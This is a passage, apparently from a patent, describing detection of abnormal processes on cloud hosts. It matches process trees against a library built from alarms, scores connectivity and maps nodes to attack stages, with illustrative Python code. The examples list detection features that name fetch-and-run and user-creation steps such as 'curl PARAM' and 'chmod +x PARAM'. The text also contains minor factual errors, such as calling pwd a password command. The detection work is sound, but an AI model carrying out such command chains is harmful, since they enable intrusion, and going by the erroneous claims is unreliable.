Specifically, the computer device may record processes in a process log before abnormal process detection, acquire a plurality of historical processes, and build a historical process tree based on a generation relationship among the plurality of historical processes. The computer equipment can respectively detect the abnormality of each process node in the historical process tree to obtain the historical alarm information of the abnormal process node. And aiming at each piece of historical alarm information, the computer equipment can determine the process node aimed at by the historical alarm information to obtain the alarm process node corresponding to the historical alarm information, and extract a process sub-tree taking the alarm process node as a new root node from the process tree where the alarm process node is located to obtain the process sub-tree corresponding to the historical alarm information. Furthermore, the computer equipment can construct an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information.
In one embodiment, the computer device may perform feature extraction on the process data corresponding to the process nodes in each process subtree to obtain process behavior features, and store the process behavior features in a tree structure in the database to obtain an abnormal process tree library. It can be understood that the process behavior characteristics corresponding to the process are stored in each process node in the abnormal process tree library.
In one embodiment, the computer device may store the process data corresponding to the process nodes in each process subtree in the database in a tree structure to obtain an abnormal process tree library. It can be understood that stored in each process node in the abnormal process tree library is process data corresponding to a process.
In the above embodiment, the process subtree corresponding to the historical warning information is obtained by extracting the process subtree taking the warning process node as the new root node from the process tree in which the warning process node is located, and since the process corresponding to the warning process node is abnormal, the possibility that each process node in the process subtree corresponding to the historical warning information is abnormal is high, an abnormal process tree library is constructed according to the process subtree corresponding to each historical warning information, so that the accuracy of the abnormal process node in the abnormal process tree library can be improved, and the accuracy of the matched abnormal process node can be improved when each process node in the target process tree is subsequently matched with the process node in the abnormal process tree library.
In one embodiment, the preliminary anomaly detection of the target process tree based on the connectivity condition between the abnormal process nodes comprises the following steps: determining connected abnormal process nodes among the matched abnormal process nodes to obtain target abnormal process nodes; and if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
The target abnormal process nodes are the abnormal process nodes determined to be connected among the matched abnormal process nodes. It can be understood that if there are multiple groups of target abnormal process nodes in the target process tree, a path can be formed between the target abnormal process nodes of each group.
Specifically, the computer device may determine the connected abnormal process nodes from the matched abnormal process nodes to obtain the target abnormal process node. For each group of target abnormal process nodes existing in the target process tree, the computer device may compare the number of the group of target abnormal process nodes with a preset number threshold. And if the number of any group of target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
In one embodiment, as shown in FIG. 7, there are 7 connected abnormal process nodes, namely, process node a, process node b, process node c, process node d, process node e, process node f and process node g. If the preset number threshold is 4 and the number of the 7 connected abnormal process nodes is greater than 4, the computer device may preliminarily determine that the target process tree to which the 7 connected abnormal process nodes belong is abnormal.
In the above embodiment, the connected abnormal process nodes represent the generation relationship between the processes corresponding to the respective process nodes, and the number of connected target abnormal process nodes represents, to a certain extent, the abnormality degree of the corresponding process tree; therefore, preliminarily determining whether the target process tree is abnormal from the number of connected target abnormal process nodes improves the accuracy of preliminary detection of the abnormality of the target process tree.
In one embodiment, determining the connected abnormal process nodes among the matched abnormal process nodes to obtain the target abnormal process nodes includes: determining connected abnormal process nodes among the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes; determining abnormal process nodes with the same process behavior characteristics among the candidate abnormal process nodes; and deduplicating the abnormal process nodes with the same process behavior characteristics to obtain the target abnormal process nodes.
The candidate abnormal process nodes are the abnormal process nodes determined to be connected among the matched abnormal process nodes, before deduplication. It is understood that the candidate abnormal process nodes may include abnormal process nodes with the same process behavior characteristics.
Specifically, the computer device may determine the connected abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes. The computer device can determine process characteristics corresponding to the abnormal process nodes of each candidate, and determine the abnormal process nodes with the same process behavior characteristics from the abnormal process nodes of the candidates. Furthermore, the computer equipment can perform duplicate removal on the abnormal process nodes with the same process behavior characteristics to obtain the target abnormal process node.
In an embodiment, the computer device may perform deduplication on the abnormal process nodes with the same process behavior characteristics, and may regard each abnormal process node with the same process behavior characteristics as an abnormal process node, and when performing quantity statistics, the number of each abnormal process node with the same process behavior characteristics is recorded as 1, and no quantity superposition is performed.
In the above embodiment, because a plurality of abnormal process nodes with the same process behavior characteristics represent the same abnormal information, counting them repeatedly has no cumulative benefit for the accuracy of the preliminary abnormality detection of the target process tree; therefore, the abnormal process nodes with the same process behavior characteristics are deduplicated to obtain the target abnormal process nodes, and whether the target process tree is abnormal is then preliminarily determined from the number of connected target abnormal process nodes, so that the accuracy of preliminary abnormality detection of the target process tree can be further improved.
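The preliminary detection step described above, as an added Python example that is not code from the patent: abnormal nodes are grouped by connectivity through parent/child edges, nodes sharing a behaviour feature are counted once, and each group's count is compared with the preset threshold. The tree, the library feature set and the threshold of 4 are constructed assumptions; nodes a..g mirror the seven connected nodes of the FIG. 7 description, with two of them sharing a feature so the deduplicated count is 6.

```python
from collections import defaultdict

# Constructed target process tree: node -> (parent node, process behaviour feature).
# Nodes a..g are seven connected abnormal nodes as in the FIG. 7 description; h is an
# abnormal node that is not connected to them; the n* nodes are normal.
TARGET_TREE = {
    "root": (None, "systemd"),
    "n1": ("root", "sshd"),
    "a": ("n1", "bash PARAM"),
    "b": ("a", "curl PARAM"),
    "c": ("b", "chmod PARAM"),
    "d": ("c", "curl PARAM"),      # same feature as b: counted once after deduplication
    "e": ("c", "useradd PARAM"),
    "f": ("e", "crontab PARAM"),
    "g": ("f", "sh PARAM"),
    "n2": ("root", "cron"),
    "n3": ("n2", "logrotate"),
    "h": ("n3", "sh PARAM"),       # abnormal but not connected to a..g
}
# Features stored in the abnormal process tree library's nodes (constructed).
LIBRARY_FEATURES = {"bash PARAM", "curl PARAM", "chmod PARAM",
                    "useradd PARAM", "crontab PARAM", "sh PARAM"}


def match_abnormal_nodes(tree, library_features):
    """A node is abnormal when its feature matches a library node's feature."""
    return {node for node, (_, feature) in tree.items() if feature in library_features}


def connected_groups(tree, abnormal):
    """Split the abnormal nodes into groups linked by parent/child edges through abnormal nodes only."""
    adjacent = defaultdict(set)
    for node, (parent, _) in tree.items():
        if node in abnormal and parent in abnormal:
            adjacent[node].add(parent)
            adjacent[parent].add(node)
    groups, seen = [], set()
    for start in sorted(abnormal):
        if start in seen:
            continue
        group, stack = set(), [start]
        while stack:
            node = stack.pop()
            if node in group:
                continue
            group.add(node)
            stack.extend(adjacent[node] - group)
        seen |= group
        groups.append(group)
    return groups


def target_abnormal_counts(tree, library_features):
    """Per connected group: number of target abnormal nodes after deduplicating equal features."""
    abnormal = match_abnormal_nodes(tree, library_features)
    return [len({tree[n][1] for n in group}) for group in connected_groups(tree, abnormal)]


def preliminary_detect(tree, library_features, threshold):
    """Preliminarily abnormal if any connected group exceeds the preset number threshold."""
    return any(count > threshold for count in target_abnormal_counts(tree, library_features))


if __name__ == "__main__":
    print(target_abnormal_counts(TARGET_TREE, LIBRARY_FEATURES))  # [6, 1]
    print(preliminary_detect(TARGET_TREE, LIBRARY_FEATURES, 4))   # True
```

Node h alone would never cross the threshold: connectivity, not the raw number of matched nodes, drives the decision.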
In one embodiment, matching each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node includes: and aiming at each process node in the target process tree, comparing the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library respectively, and taking the process node with the consistent characteristics in the target process tree as the abnormal process node.
Specifically, the computer device may determine process behavior characteristics corresponding to each process node in the abnormal process tree library. And aiming at each process node in the target process tree, the computer equipment can determine the process behavior characteristics corresponding to the process node, respectively compare the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to the process nodes in the abnormal process tree library, and take the process nodes with consistent characteristics in the target process tree as abnormal process nodes.
In one embodiment, both the process nodes of the target process tree and the process nodes in the abnormal process tree library store corresponding process behavior characteristics; it can be understood that the process behavior characteristics are extracted based on the process data corresponding to the respective process node. For each process node in the target process tree, the computer device may compare the process behavior characteristics stored in that process node with the process behavior characteristics stored in each process node of the abnormal process tree library, and take the process nodes of the target process tree whose characteristics match as abnormal process nodes.
In one embodiment, process data is stored in both the process nodes of the target process tree and the process nodes in the abnormal process tree library. It can be understood that the computer device can perform feature extraction on the process data stored in the process nodes of the abnormal process tree library to obtain the process behavior characteristics corresponding to each process node in the library. For each process node in the target process tree, the computer device can extract features from the process data stored in that process node to obtain its process behavior characteristics, compare them respectively with the process behavior characteristics corresponding to the process nodes in the abnormal process tree library, and take the process nodes of the target process tree whose characteristics match as abnormal process nodes.
In the above embodiment, since the process behavior characteristics can accurately represent the abnormal information corresponding to the corresponding process node, the determination accuracy of the abnormal process node can be further improved by comparing the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library.
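An added Python example, not code from the patent, covering both the library construction step (extracting the process subtree rooted at each alarm process node from a historical process tree) and the matching step above (comparing each target node's behaviour feature with the features stored in the library's nodes). The historical tree, the alert records and the target tree are constructed assumptions.

```python
from collections import defaultdict

# Constructed historical process tree: node -> (parent node, process behaviour feature).
HISTORY_TREE = {
    "p0": (None, "systemd"),
    "p1": ("p0", "sshd"),
    "p2": ("p1", "bash"),
    "p3": ("p2", "wget PARAM"),
    "p4": ("p3", "chmod PARAM"),
    "p5": ("p4", "sh PARAM"),
    "p6": ("p0", "cron"),
    "p7": ("p6", "logrotate"),
    "p8": ("p1", "bash"),
    "p9": ("p8", "useradd PARAM"),
}
# Constructed historical alerts; each names the process node it was raised for.
HISTORY_ALERTS = [
    {"alert_id": "hist-001", "node": "p3"},
    {"alert_id": "hist-002", "node": "p9"},
]
# Constructed target tree to be matched against the library.
TARGET_TREE = {
    "t0": (None, "systemd"),
    "t1": ("t0", "sshd"),
    "t2": ("t1", "bash"),
    "t3": ("t2", "chmod PARAM"),
    "t4": ("t3", "sh PARAM"),
    "t5": ("t1", "ls PARAM"),
}


def children_of(tree):
    ch = defaultdict(list)
    for node, (parent, _) in tree.items():
        if parent is not None:
            ch[parent].append(node)
    return ch


def extract_subtree(tree, new_root):
    """Cut out the subtree rooted at the alarm process node; that node becomes a root (no parent)."""
    ch = children_of(tree)
    sub = {new_root: (None, tree[new_root][1])}
    stack = [new_root]
    while stack:
        node = stack.pop()
        for child in ch[node]:
            sub[child] = (node, tree[child][1])
            stack.append(child)
    return sub


def build_library(history_tree, alerts):
    """Abnormal process tree library: one process subtree per historical alert."""
    return {a["alert_id"]: extract_subtree(history_tree, a["node"]) for a in alerts}


def library_features(library):
    """Behaviour features stored in the library's process nodes."""
    return {feature for subtree in library.values() for (_, feature) in subtree.values()}


def match_abnormal_nodes(target_tree, library):
    """Target nodes whose behaviour feature equals the feature of some library node."""
    feats = library_features(library)
    return sorted(node for node, (_, feature) in target_tree.items() if feature in feats)


if __name__ == "__main__":
    lib = build_library(HISTORY_TREE, HISTORY_ALERTS)
    print(match_abnormal_nodes(TARGET_TREE, lib))  # ['t3', 't4']
```

Ancestors of an alarm node (here the bash shell p2) are not part of the extracted subtree, so an ordinary bash node in the target tree is not matched.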
In one embodiment, process behavior characteristics are stored in the process nodes of the target process tree; the stored process behavior characteristics are obtained by feature extraction from the process commands corresponding to the process nodes; the method also includes a step of constructing the target process tree, which includes: acquiring an initial process tree constructed based on a generation relation among a plurality of processes, the initial process tree comprising at least one process node storing a process command, and a generation relation existing between two process nodes on a common edge in the initial process tree; homogenizing the process commands stored in the process nodes of the initial process tree that have different forms but the same function, so that all process commands with the same function take the same form, obtaining a homogenized process tree; and performing feature extraction on the process commands in the process nodes of the homogenized process tree to obtain process behavior characteristics, and constructing the target process tree based on the process behavior characteristics.
The initial process tree is constructed based on the generation relation among the processes and before the process command in the process node is subjected to homogenization conversion. The process commands with different forms mean that the process commands are different in description form. It will be appreciated that the process data referred to above includes process commands.
For example, the two process commands passwd and pwd differ in form but have the same function, i.e. passwd and pwd both relate to passwords. The two process commands adduser and useradd differ in form but have the same function, namely, adduser and useradd both add a new user. The forms of the two process commands http and https also differ, but they have the same function, i.e. http, https, ftp and tcp all represent transport protocols.
Specifically, the computer device may acquire an initial process tree constructed based on a generation relationship among a plurality of processes, and perform homogenization conversion on the process commands, stored in the process nodes of the initial process tree, that have different forms but the same function. That is, one process command is selected from a set of process commands having different forms but the same function, and every process command in that set is replaced with the selected one, so that all process commands having the same function take the same form, yielding the homogenized process tree. Furthermore, the computer device can perform feature extraction on the process commands in the process nodes of the homogenized process tree to obtain process behavior features, and construct the target process tree based on the process behavior features. It can be understood that each process node of the target process tree stores the process behavior characteristics corresponding to that process node.
In the above embodiment, the process commands stored in the process nodes of the initial process tree that differ in form but have the same function are homogenized, so that process commands having the same function take the same form and the homogenized process tree is obtained; feature extraction is then performed on the process commands in the process nodes of the homogenized process tree, so that more accurate process behavior features are obtained and the accuracy of process behavior feature extraction is improved. Abnormal process nodes can therefore subsequently be identified from the target process tree more accurately, improving the accuracy of abnormal process node identification.
In one embodiment, the process nodes of the target process tree further store the command parameters corresponding to the process commands; the stored process behavior characteristics are extracted based on the process command corresponding to the process node and the command parameters corresponding to that process command; and performing feature extraction on the process commands in the process nodes of the homogenized process tree to obtain process behavior characteristics and constructing the target process tree based on the process behavior characteristics comprises: performing feature extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter features; and performing feature extraction on the process command and the command parameter features in each process node to obtain process behavior features, and constructing the target process tree based on the process behavior features.
The command parameter feature is obtained by extracting the feature of the command parameter. It will be appreciated that the process data referred to above includes process commands, as well as command parameters corresponding to the process commands.
Specifically, the computer device may perform feature extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter features. It can be understood that after feature extraction has been performed on the command parameters of the process nodes in the homogenized process tree, each process node in the process tree holds a process command and command parameter features. Furthermore, the computer device can perform feature extraction on the process command and the command parameter features in each process node to obtain the process behavior features, and construct the target process tree based on the process behavior features. It can be understood that each process node of the target process tree stores the process behavior characteristics corresponding to that process node.
For example, the process command is https, and the command parameter corresponding to https is a specific IP address. If the command parameter corresponding to process node A is IP1 and the command parameter corresponding to process node B is IP2, the computer device may perform feature extraction on the command parameters IP1 and IP2 respectively and obtain the same command parameter feature; for example, feature extraction on the command parameters IP1 and IP2 yields the same command parameter feature PARAM (parameter).
In one embodiment, as shown in fig. 8, the process command is https, and the command parameter corresponding to https is a specific IP address, illustrated in fig. 8 as "://xxx". The feature extraction of command parameters may be divided into seven levels: the first level extracts the feature "IP" for the command parameter, the second level extracts the feature "URL", and the third level extracts the feature "PARAM". Since the feature extracted at the third level represents well that a specific IP address is a changeable parameter, the computer device may use the feature extracted at the third level as the command parameter feature.
In the above embodiment, since the change of the command parameter does not affect the whole attack process, the process behavior feature is obtained by performing feature extraction on the command parameter of the process node in the process tree after homogenization to obtain the command parameter feature, and performing feature extraction on the process command and the command parameter feature in the process node to obtain the process behavior feature, so that a relatively accurate process behavior feature can be obtained, the accuracy of extracting the process behavior feature is improved, an abnormal process node can be identified from the target process tree more accurately in the follow-up process, and the accuracy of identifying the abnormal process node is improved.
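An added Python example, not code from the patent, showing command homogenization and the levelled abstraction of command parameters described above: the same behaviour feature results for https with IP1 and http with IP2. The synonym groups extend the patent's passwd/pwd, adduser/useradd and http/https/ftp/tcp examples, the three abstraction levels are the IP, URL and PARAM levels of the fig. 8 description, and the rule that option switches such as -m are kept verbatim is an assumption.

```python
import ipaddress
from urllib.parse import urlparse

# Groups of process commands that differ in form but share a function; the first entry of
# each group is the canonical form used for homogenization (constructed assumption).
SYNONYM_GROUPS = [
    ["passwd", "pwd"],
    ["adduser", "useradd"],
    ["https", "http", "ftp", "tcp"],
]
CANONICAL = {cmd: group[0] for group in SYNONYM_GROUPS for cmd in group}


def homogenize(command):
    """Replace a command by the canonical form of its synonym group (unchanged if it has none)."""
    return CANONICAL.get(command, command)


def classify(param):
    """Most specific label of a parameter: 'IP', 'URL', or None for anything else."""
    host = urlparse(param).hostname if "://" in param else param
    try:
        ipaddress.ip_address(host)
        return "IP"
    except ValueError:
        return "URL" if "://" in param else None


def parameter_feature(param, level=3):
    """Level 1 abstracts IP literals to IP, level 2 IPs and URLs to URL, level 3 every
    changeable parameter to PARAM. Option switches such as -m are kept verbatim (assumption)."""
    if param.startswith("-"):
        return param
    label = classify(param)
    if level == 1:
        return "IP" if label == "IP" else param
    if level == 2:
        return "URL" if label in ("IP", "URL") else param
    return "PARAM"


def behavior_feature(command_line, level=3):
    """Process behaviour feature: homogenized command plus abstracted parameters."""
    command, *params = command_line.split()
    return " ".join([homogenize(command)] + [parameter_feature(p, level) for p in params])


if __name__ == "__main__":
    # Constructed sample command lines; the addresses are documentation ranges.
    for line in ("https 203.0.113.5", "http 198.51.100.7", "useradd -m eve", "adduser -m mallory"):
        print(line, "->", behavior_feature(line))
```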
In one embodiment, the method further comprises: and under the condition that the abnormal detection result indicates that the target process tree is abnormal but the target process tree is not really abnormal, determining the process node causing the error report of the target process tree abnormality in the abnormal process tree library, and deleting the process node causing the error report so as to update the abnormal process tree library.
In one embodiment, in the event that the exception detection result indicates that the target process tree is an exception, but the target process tree is not a true exception, the computer device may determine a process node in the exception process tree library that caused the false positive target process tree exception and directly delete the process node that caused the false positive to update the exception process tree library. It can be understood that, in this embodiment, the process node itself causing the false alarm is deleted, and the process tree in which the process node causing the false alarm is located is still retained in the abnormal process tree library.
In one embodiment, in the case that the anomaly detection result indicates that the target process tree is abnormal but the target process tree is not truly abnormal, the computer device may determine the process node in the abnormal process tree library that caused the false alarm of the target process tree anomaly, determine the process tree in which that node is located, and delete that process tree to update the abnormal process tree library. It can be understood that in this embodiment the whole process tree in which the node causing the false alarm is located is deleted from the abnormal process tree library, not just the node itself.
In the above embodiments, the abnormal process tree library is updated by deleting the process node (or the process tree) causing the false alarm, so that the accuracy of the data stored in the abnormal process tree library can be improved, and the accuracy of subsequent abnormal process detection can be improved.
In one embodiment, obtaining a target process tree constructed based on generation relationships among a plurality of processes includes: acquiring a target process tree of a host; the target process tree is constructed according to the generation relationship among a plurality of processes running on the host; the method further comprises the following step: if the anomaly detection result for the target process tree indicates that the target process tree is abnormal, determining that a process attacking the host exists among the plurality of processes.
In particular, the computer device mentioned above includes a host on which a plurality of processes can be run. The host computer can construct a target process tree according to the generation relationship among a plurality of processes running locally. The host can match each process node in the target process tree with a process node in a pre-constructed abnormal process tree library to obtain a matched abnormal process node, and performs primary abnormal detection on the target process tree based on the communication condition between the abnormal process nodes. Under the condition of preliminarily detecting the abnormality of the target process tree, the host can map the process behavior characteristics corresponding to the abnormal process node to obtain the attack stage corresponding to the abnormal process node. Furthermore, the host can perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each anomalous process node in the target process tree, so as to obtain an anomaly detection result aiming at the target process tree. It can be understood that if the abnormality detection result for the target process tree indicates that the target process tree is abnormal, it is determined that a process attacking the host exists in the plurality of processes running on the host. And if the abnormal detection result aiming at the target process tree indicates that the target process tree is normal, judging that the process attacking the host does not exist in the plurality of processes running on the host.
In one embodiment, the host may be a cloud host deployed on a cloud, or may be another host deployed in a non-cloud environment.
In the above embodiment, the target process tree constructed according to the generation relationship among the processes running on the host is detected, and whether a process attacking the host exists in the processes running on the host is determined based on the abnormal detection result for the target process tree, so that the abnormal process detection accuracy can be improved.
In one embodiment, as shown in fig. 9, a subtree extraction unit, an anomaly detection unit and an operation unit are included in a computer device. The computer equipment can obtain at least one piece of historical alarm information from the historical process log through the subtree extraction unit; for each piece of historical alarm information, determining a process node to which the historical alarm information is directed, obtaining an alarm process node corresponding to the historical alarm information (as can be understood, each alarm process node has a unique process node identifier), and extracting a process subtree taking the alarm process node as a new root node from a process tree in which the alarm process node is located, so as to obtain a process subtree corresponding to the historical alarm information; and constructing an abnormal process tree library according to the process subtrees respectively corresponding to the historical alarm information. Furthermore, the computer device can acquire a plurality of processes from the real-time process log through the abnormality detection unit, and construct and obtain the target process tree based on the plurality of processes. And aiming at each process node in the target process tree, comparing the process node with each process node in the abnormal process tree library respectively, and taking the process node which is consistent with the process node in the target process tree as the detected abnormal process node. The computer device may perform preliminary anomaly detection on the target process tree based on connectivity between the anomalous process nodes. 
Under the condition of preliminarily detecting the abnormality of the target process tree, mapping the process behavior characteristics corresponding to the abnormal process node to obtain an attack stage corresponding to the abnormal process node; and performing advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree to obtain an anomaly detection result aiming at the target process tree. Generating corresponding single-point alarm information aiming at each abnormal process node in the target process tree; after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain alarm information corresponding to the process chain; and merging the alarm information corresponding to each process chain in the target process tree to obtain and output target alarm information. And under the condition that the abnormal detection result indicates that the target process tree is abnormal but the target process tree is not really abnormal, the computer equipment can reject the false report through the operation unit, determine the process node causing the false report of the target process tree abnormality in the abnormal process tree library, and delete the process node causing the false report so as to update the abnormal process tree library. In addition, the operation unit can delete the process nodes causing false alarm in the abnormal process tree library through manual intervention.
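The subtree extraction unit and the two false-alarm update strategies of the operation unit described above, as an added example that is not code from the patent. The tree layout, node identifiers, feature strings and historical alarms are constructed for illustration, and the way a deleted node's children are re-attached is an assumption the patent text does not fix.

```python
from __future__ import annotations
from dataclasses import dataclass, field

@dataclass
class ProcNode:
    node_id: str                              # unique process node identifier
    feature: str                              # process behaviour feature of the node
    children: list[ProcNode] = field(default_factory=list)

def find(root: ProcNode, node_id: str) -> ProcNode | None:
    """Depth-first lookup of a node by its identifier."""
    if root.node_id == node_id:
        return root
    for c in root.children:
        hit = find(c, node_id)
        if hit is not None:
            return hit
    return None

def extract_subtree(root: ProcNode, alarm_id: str) -> ProcNode:
    """Subtree extraction unit: the alarm process node becomes the new root and
    its descendants are copied; the rest of the historical tree is discarded."""
    node = find(root, alarm_id)
    if node is None:
        raise KeyError(alarm_id)
    return ProcNode(node.node_id, node.feature, [extract_subtree(c, c.node_id) for c in node.children])

def build_library(historical_alarms) -> dict[str, ProcNode]:
    """historical_alarms: (historical process tree, alarm node id) pairs. One
    library subtree per alarm, keyed by the alarm node identifier."""
    return {alarm_id: extract_subtree(tree, alarm_id) for tree, alarm_id in historical_alarms}

def library_features(library) -> set[str]:
    """Features of every library node; target tree nodes are matched against these."""
    feats: set[str] = set()
    def walk(n):
        feats.add(n.feature)
        for c in n.children:
            walk(c)
    for root in library.values():
        walk(root)
    return feats

def _prune(n: ProcNode, node_id: str) -> bool:
    """Remove node_id from under n, re-attaching its children to n (assumption)."""
    for c in n.children:
        if c.node_id == node_id:
            n.children.remove(c)
            n.children.extend(c.children)
            return True
        if _prune(c, node_id):
            return True
    return False

def delete_node(library: dict[str, ProcNode], node_id: str) -> None:
    """Operation unit, first strategy: drop only the node that caused the false
    alarm; its subtree stays in the library. If the node is a library root, its
    children become library entries of their own (assumption)."""
    for key, root in list(library.items()):
        if root.node_id == node_id:
            del library[key]
            for c in root.children:
                library[c.node_id] = c
            return
        if _prune(root, node_id):
            return
    raise KeyError(node_id)

def delete_tree(library: dict[str, ProcNode], node_id: str) -> None:
    """Operation unit, second strategy: drop the whole library subtree containing the node."""
    for key, root in list(library.items()):
        if find(root, node_id) is not None:
            del library[key]
            return
    raise KeyError(node_id)

def sample_history():
    """Constructed historical alarms: two process trees with one alarm node each."""
    t1 = ProcNode("p1", "bash", [
        ProcNode("p2", "bash -c PARAM", [ProcNode("p3", "curl PARAM"), ProcNode("p4", "chmod +x PARAM")]),
        ProcNode("p5", "python app.py"),
    ])
    t2 = ProcNode("q1", "curl PARAM", [ProcNode("q2", "bash -c PARAM")])
    return [(t1, "p2"), (t2, "q1")]
```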
As shown in fig. 10, in one embodiment, an abnormal process detection method is provided, and the method is applicable to a computer device, where the computer device may be a terminal or a server, and is executed by the terminal or the server itself, or may be implemented through interaction between the terminal and the server. The method can be applied to a scene of attack detection aiming at the cloud host, wherein the cloud host refers to a host deployed in a cloud environment. It can be understood that the method can also be applied to a scenario of attack detection for computer devices in a non-cloud environment, which is not limited by this embodiment. The method specifically comprises the following steps:
step 1002, obtaining an initial process tree constructed based on a generation relationship among a plurality of processes; the initial process tree comprises at least one process node which stores a process command and a command parameter corresponding to the process command; and a generating relation exists between two process nodes which are on the same edge in the initial process tree.
It can be understood that, in the case that the abnormal process detection method is applied to a scenario of attack detection for a cloud host, multiple processes may be run on the cloud host, and the cloud host may construct an initial process tree based on a generation relationship among the multiple processes.
Step 1004, performing homogenization conversion on the process commands with different forms and the same function stored in the process nodes in the initial process tree, so that the process commands with the same function have the same form, and obtaining a homogenized process tree.
Step 1006, performing feature extraction on the command parameters of the process nodes in the homogenized process tree to obtain command parameter features.
Step 1008, extracting the characteristics of the process command and the command parameter characteristics in the process node to obtain process behavior characteristics, and constructing a target process tree based on the process behavior characteristics; the process node of the target process tree stores the process behavior characteristics.
It can be understood that, when the abnormal process detection method is applied to a scenario of attack detection for a cloud host, the constructed target process tree is the target process tree constructed for the cloud host.
Step 1010, acquiring a target process tree constructed based on a generation relationship among a plurality of processes; the target process tree comprises at least one process node; a generation relation exists between two process nodes on a common edge in the target process tree; the target process tree comprises at least one process chain; each process chain comprises at least one process node.
Step 1012, aiming at each process node in the target process tree, comparing the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library, and taking the process node with the consistent characteristics as the abnormal process node.
Step 1014, determining the connected abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes.
Step 1016, determining abnormal process nodes with the same process behavior characteristics from the plurality of candidate abnormal process nodes.
Step 1018, performing duplicate removal on the abnormal process nodes with the same process behavior characteristics to obtain target abnormal process nodes.
Step 1020, if the number of the target abnormal process nodes is greater than a preset number threshold, preliminarily determining that the target process tree is abnormal.
Step 1022, under the condition of preliminarily detecting the target process tree exception, determining the mapping relationship between the preset process behavior characteristics and the attack stage.
Step 1024, for each abnormal process node, determining the attack stage mapped to the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, to obtain the attack stage corresponding to the abnormal process node.
Step 1026, if at least one stage belonging to the execution type exists among the attack stages respectively corresponding to the abnormal process nodes in the target process tree, determining that the target process tree is abnormal.
It can be understood that, in the case that the abnormal process detection method is applied to an attack detection scenario for the cloud host, if a target process tree of the cloud host is abnormal, it may be determined that a process which attacks the cloud host exists in a plurality of processes running on the cloud host. In turn, steps 1028 through 1032 may be performed to generate target alarm information for the attacked cloud host.
Step 1028, generating corresponding single-point alarm information for each abnormal process node in the target process tree.
Step 1030, after the target process tree is detected to be abnormal in the advanced stage, aiming at each process chain in the target process tree, connecting the single-point alarm information corresponding to each abnormal process node on the process chain in series to obtain the alarm information corresponding to the process chain.
Step 1032, merging the alarm information respectively corresponding to each process chain in the target process tree to obtain target alarm information, and outputting the target alarm information.
The output target alarm information can prompt and alert on the condition that the cloud host has been attacked by a process, so that an attack on the cloud host does not go unnoticed, and the security of the cloud host is thereby improved.
It should be noted that the abnormal process detection method in the foregoing embodiment is not limited to the attack detection scenario for a cloud host, and may also be used in other scenarios to detect an abnormal process. A computer device in a general (i.e., non-cloud) environment may likewise be attacked by a process, for example a general computer terminal may be attacked by a hacker using a process, so the abnormal process detection method of the present application may also be used in an attack detection scenario for a computer device in a general environment. This is not limiting.
In order to more clearly understand how the abnormal process detection method in the embodiment of the present application is applied in a scenario of attack detection for a cloud host, the following specific description is made. Specifically, the cloud host may obtain an initial process tree constructed based on a generation relationship among a plurality of processes running locally; the initial process tree comprises at least one process node which stores a process command and a command parameter corresponding to the process command; and a generating relation exists between two process nodes which are on the same edge in the initial process tree. And carrying out homogenization conversion on all process commands with different forms and the same function stored in all process nodes in the initial process tree so as to enable all process commands with the same function to have the same form and obtain a homogenized process tree. And carrying out characteristic extraction on the command parameters of the process nodes in the process tree after homogenization to obtain command parameter characteristics. Performing feature extraction on process commands and command parameter features in the process nodes to obtain process behavior features, and constructing a target process tree based on the process behavior features; the process node of the target process tree stores the process behavior characteristics.
The cloud host can acquire a target process tree constructed based on the generation relationship among the processes; the target process tree comprises at least one process node; a generating relation exists between two process nodes sharing a common edge in the target process tree; the target process tree comprises at least one process chain; each process chain includes at least one process node. And aiming at each process node in the target process tree, comparing the process behavior characteristics corresponding to the process node with the process behavior characteristics corresponding to each process node in the abnormal process tree library respectively, and taking the process node with the consistent characteristics in the target process tree as the abnormal process node. And determining communicated abnormal process nodes from the matched abnormal process nodes to obtain a plurality of candidate abnormal process nodes. And determining abnormal process nodes with the same process behavior characteristics from the plurality of candidate abnormal process nodes. And removing the duplication of the abnormal process nodes with the same process behavior characteristics to obtain the target abnormal process node. And if the number of the target abnormal process nodes is larger than a preset number threshold, preliminarily judging that the target process tree is abnormal.
Under the condition of preliminarily detecting the abnormality of the target process tree, the cloud host can determine the mapping relation between the preset process behavior characteristics and the attack stage. And aiming at each abnormal process node, determining an attack stage mapped with the process behavior characteristics corresponding to the abnormal process node based on the mapping relation, and obtaining the attack stage corresponding to the abnormal process node. And if at least one stage belonging to the execution type exists in the attack stages respectively corresponding to the abnormal process nodes in the target process tree, judging that the target process tree is abnormal. It can be understood that if the target process tree is detected to be abnormal, it is determined that a process which attacks the cloud host exists in the plurality of processes running on the cloud host. And if the target process tree is detected to be normal, judging that the process for attacking the cloud host does not exist in the plurality of processes running on the cloud host.
The cloud host can generate corresponding single-point alarm information aiming at each abnormal process node in the target process tree, and after the target process tree is detected to be abnormal in the advanced stage, the single-point alarm information corresponding to each abnormal process node in the process chain is connected in series aiming at each process chain in the target process tree, so that the alarm information corresponding to the process chain is obtained. And merging the alarm information corresponding to each process chain in the target process tree to obtain and output target alarm information. By the abnormal process detection method, the abnormal process detection accuracy rate of the cloud host deployed in the cloud environment can be improved.
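Steps 1002 to 1032 above, and the cloud host walkthrough that restates them, carried out end to end on constructed process records, as an added example that is not code from the patent. The command alias table, the PARAM placeholder rule, the stage mapping table, the threshold, the reading of "connected" as parent or child also being abnormal, and the sample records and library features are all assumptions made for illustration.

```python
from __future__ import annotations
from dataclasses import dataclass
import re

# Step 1004 (assumed alias table): different forms of a command with the same function.
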